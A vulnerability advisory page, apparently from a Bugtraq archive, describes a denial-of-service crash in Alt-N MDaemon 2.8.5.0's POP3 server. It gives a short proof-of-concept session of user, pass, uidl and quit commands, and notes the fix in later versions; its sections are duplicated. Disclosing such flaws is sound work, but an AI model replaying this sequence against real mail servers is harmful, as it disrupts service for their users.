Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability
BID:1366
Info
Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability
| Bugtraq ID: | 1366 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2000-0501 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 16 2000 12:00AM |
| Updated: | Mar 19 2015 08:08AM |
| Credit: | Posted to NTBugtraq on June 16, 2000 by Craig <[email protected]>. |
| Vulnerable: |
Alt-N MDaemon 2.8.5 0 |
| Not Vulnerable: |
Alt-N MDaemon 3.0.4 |
Discussion
Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability
A remote user is capable of crashing Alt-N MDaemon 2.8.5.0 by executing the pass command, then the UIDL command and quitting the mail server before the UIDL has returned a response. This must be done before the user is presented with the POP3 login banner. Restarting the application is required in order to regain normal functionality.
A remote user is capable of crashing Alt-N MDaemon 2.8.5.0 by executing the pass command, then the UIDL command and quitting the mail server before the UIDL has returned a response. This must be done before the user is presented with the POP3 login banner. Restarting the application is required in order to regain normal functionality.
Exploit / POC
Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability
Perform the following very quickly:
+OK <target> POP service ready using MDaemon
v2.8.5.0 T
User <username>
+OK <username>... Recipient ok
pass <password>
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK <username> <target> POP Server signing off (mailbox empty)
Perform the following very quickly:
+OK <target> POP service ready using MDaemon
v2.8.5.0 T
User <username>
+OK <username>... Recipient ok
pass <password>
-ERR that command is valid only in the AUTHORIZATION state!
uidl
-ERR unknown POP command!
quit
+OK
.
quit
+OK <username> <target> POP Server signing off (mailbox empty)
Solution / Fix
Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability
Solution:
Alt-N has rectified this issue in Mdaemon V2.8.6.0 and all later versions.
Solution:
Alt-N has rectified this issue in Mdaemon V2.8.6.0 and all later versions.
References
Alt-N MDaemon 2.8.5.0 UIDL DoS Vulnerability
References:
References: